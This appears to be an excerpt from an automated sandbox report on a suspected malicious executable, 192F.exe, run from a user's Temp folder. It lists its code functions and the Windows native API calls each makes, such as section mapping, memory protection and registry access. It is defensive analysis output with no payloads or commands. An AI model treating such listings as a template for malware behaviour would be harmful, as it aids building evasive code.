Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AB70 ZwReleaseWorkerFactoryWorker, 29_2_6A95AB70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 29_2_6A9A8372
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A943B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 29_2_6A943B7A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912B7E ZwSetInformationThread,ZwClose, 29_2_6A912B7E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AB60 ZwReleaseKeyedEvent, 29_2_6A95AB60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 29_2_6A9C6369
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A926B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor, 29_2_6A926B6B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A997365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException, 29_2_6A997365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 29_2_6A9A6365
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 29_2_6A93E090
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A890 ZwQueryDebugFilterState, 29_2_6A95A890
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959890 ZwFsControlFile, 29_2_6A959890
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 29_2_6A913880
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 29_2_6A94A080
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95108B ZwClose, 29_2_6A95108B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B0B0 ZwTraceControl, 29_2_6A95B0B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 29_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9418B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 29_2_6A9418B9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93F0AE ZwSetInformationWorkerFactory, 29_2_6A93F0AE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C60A2 ZwQueryInformationFile, 29_2_6A9C60A2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9510D7 ZwOpenKey,ZwCreateKey, 29_2_6A9510D7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9598D0 ZwQueryAttributesFile, 29_2_6A9598D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A0D0 ZwCreateTimer2, 29_2_6A95A0D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9170C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 29_2_6A9170C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9500C2 ZwAlertThreadByThreadId, 29_2_6A9500C2
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 29_2_6A91B8F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9140FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 29_2_6A9140FD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C60E9 ZwOpenKey,ZwClose,ZwClose, 29_2_6A9C60E9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CE0E9 RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwClose,RtlFreeHeap, 29_2_6A9CE0E9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 29_2_6A9EF019
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 29_2_6A91F018
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959830 ZwOpenFile, 29_2_6A959830
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 29_2_6A944020
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A915050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 29_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959850 ZwQueryDirectoryFile, 29_2_6A959850
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8858 ZwAlertThreadByThreadId, 29_2_6A9E8858
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959840 ZwDelayExecution, 29_2_6A959840
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 29_2_6A9A1879
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A92106F ZwOpenKey,ZwClose, 29_2_6A92106F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959990 ZwQueryVolumeInformationFile, 29_2_6A959990
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 29_2_6A91519E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 29_2_6A93C182
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9DA189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 29_2_6A9DA189
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B180 ZwWaitForAlertByThreadId, 29_2_6A95B180
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959980 ZwCreateEvent, 29_2_6A959980
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A980 ZwQueryInstallUILanguage, 29_2_6A95A980
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 29_2_6A9C6186
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A9B0 ZwQueryLicenseValue, 29_2_6A95A9B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9951BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 29_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94C9BF DbgPrintEx,wcsrchr,memcpy,DbgPrintEx,ZwClose,DbgPrintEx,DbgPrintEx,RtlDosPathNameToRelativeNtPathName_U,DbgPrintEx,ZwOpenFile,ZwClose,RtlFreeHeap,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlDeleteBoundaryDescriptor,ZwClose,RtlFreeHeap, 29_2_6A94C9BF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF1B5 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 29_2_6A9EF1B5
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B1A0 ZwWaitForKeyedEvent, 29_2_6A95B1A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D49A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 29_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 29_2_6A9A19C8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F1E4 ZwEnumerateValueKey, 29_2_6A91F1E4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E89E7
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91E9ED RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwOpenKey,ZwClose,ZwClose,RtlFreeHeap, 29_2_6A91E9ED
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A919100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 29_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 29_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959900 ZwOpenEvent, 29_2_6A959900
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9B5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 29_2_6A9B5100
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A193B ZwRaiseException,ZwTerminateProcess, 29_2_6A9A193B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A130 ZwCreateWaitCompletionPacket, 29_2_6A95A130
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9EF13B ZwOpenKey,ZwCreateKey, 29_2_6A9EF13B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A934120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 29_2_6A934120
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959920 ZwDuplicateToken, 29_2_6A959920
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 29_2_6A91F150
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B150 ZwUnsubscribeWnfStateChange, 29_2_6A95B150
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 29_2_6A91395E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 29_2_6A93B944
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 29_2_6A91B171
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D976 ZwCreateFile,ZwCreateFile, 29_2_6A94D976
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1976 ZwCreateEvent, 29_2_6A9A1976
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B160 ZwUpdateWnfStateData, 29_2_6A95B160
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95A160 ZwCreateWorkerFactory, 29_2_6A95A160
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8966
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 29_2_6A9CBE9B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 29_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912E9F ZwCreateEvent,ZwClose, 29_2_6A912E9F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A913E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A913E80
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 29_2_6A9E3EBC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 29_2_6A93E6B0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959EA0 ZwCompareSigningLevels, 29_2_6A959EA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9A2EA3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A949ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 29_2_6A949ED0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9596D0 ZwCreateKey, 29_2_6A9596D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9166D4 RtlInitUnicodeString,ZwQueryValueKey, 29_2_6A9166D4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8ED6
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 29_2_6A912ED8
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9596C0 ZwSetInformationProcess, 29_2_6A9596C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 29_2_6A9A16FA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 29_2_6A91B6F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A96DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 29_2_6A96DEF0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93E6F9 ZwAlpcSetInformation, 29_2_6A93E6F9
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9276FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 29_2_6A9276FE
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9596E0 ZwFreeVirtualMemory, 29_2_6A9596E0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959610 ZwEnumerateValueKey, 29_2_6A959610
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A952E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 29_2_6A952E1C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9A2E14
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 29_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91B630 ZwWaitForKeyedEvent, 29_2_6A91B630
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9CFE3F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959E30 ZwCancelWaitCompletionPacket, 29_2_6A959E30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959E20 ZwCancelTimer2, 29_2_6A959E20
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 29_2_6A9E3E22
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 29_2_6A95B650
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959650 ZwQueryValueKey, 29_2_6A959650
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 29_2_6A9A6652
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 29_2_6A95B640
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AE70 ZwSetInformationWorkerFactory, 29_2_6A95AE70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959670 ZwQueryInformationProcess, 29_2_6A959670
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 29_2_6A94BE62
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94FF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 29_2_6A94FF9C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5780 DbgPrompt,ZwWow64DebuggerCall, 29_2_6A9A5780
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9C5F87 ZwUnmapViewOfSection, 29_2_6A9C5F87
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A912FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99A7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 29_2_6A99A7AC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9597A0 ZwUnmapViewOfSection, 29_2_6A9597A0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A953FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 29_2_6A953FA0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AFD0 ZwShutdownWorkerFactory, 29_2_6A95AFD0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 29_2_6A94DFDF
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 29_2_6A91F7C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9597C0 ZwTerminateProcess, 29_2_6A9597C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94D7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 29_2_6A94D7CA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A920FFD RtlInitUnicodeString,ZwQueryValueKey, 29_2_6A920FFD
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A0FEC ZwDuplicateObject,ZwDuplicateObject, 29_2_6A9A0FEC
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9437EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 29_2_6A9437EB
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959710 ZwQueryInformationToken, 29_2_6A959710
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A6715 memset,memcpy,ZwTraceEvent, 29_2_6A9A6715
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A949702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 29_2_6A949702
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 29_2_6A94E730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959730 ZwQueryVirtualMemory, 29_2_6A959730
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CCF30 ZwAlertThreadByThreadId, 29_2_6A9CCF30
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959750 ZwQueryInformationThread, 29_2_6A959750
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A5F5F RtlInitUnicodeString,ZwOpenFile,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlAllocateHeap,RtlInitUnicodeString,ZwQueryDirectoryFile,RtlAllocateHeap,memcpy,RtlFreeHeap,ZwClose, 29_2_6A9A5F5F
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959740 ZwOpenThreadToken, 29_2_6A959740
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A950F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 29_2_6A950F48
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 29_2_6A94174B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A99A746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 29_2_6A99A746
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959F70 ZwCreateIoCompletion, 29_2_6A959F70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959770 ZwSetInformationFile, 29_2_6A959770
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CCF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 29_2_6A9CCF70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A916F60 RtlGetPersistedStateLocation,ZwOpenKey,memcpy,RtlGetPersistedStateLocation,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlAllocateHeap,ZwQueryValueKey,RtlExpandEnvironmentStrings,memcpy,ZwClose,ZwClose,RtlFreeHeap, 29_2_6A916F60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8F6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AF60 ZwSetTimer2, 29_2_6A95AF60
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 29_2_6A9A176C
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A94CF6A memcpy,memcpy,RtlDosPathNameToRelativeNtPathName_U,ZwOpenFile,memcpy,RtlFreeHeap,RtlDeleteBoundaryDescriptor,DbgPrintEx,DbgPrintEx,DbgPrintEx,ZwClose,RtlFreeHeap,DbgPrintEx,memcpy,DbgPrintEx,ZwClose, 29_2_6A94CF6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A993C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 29_2_6A993C93
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A91EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose, 29_2_6A91EC9B
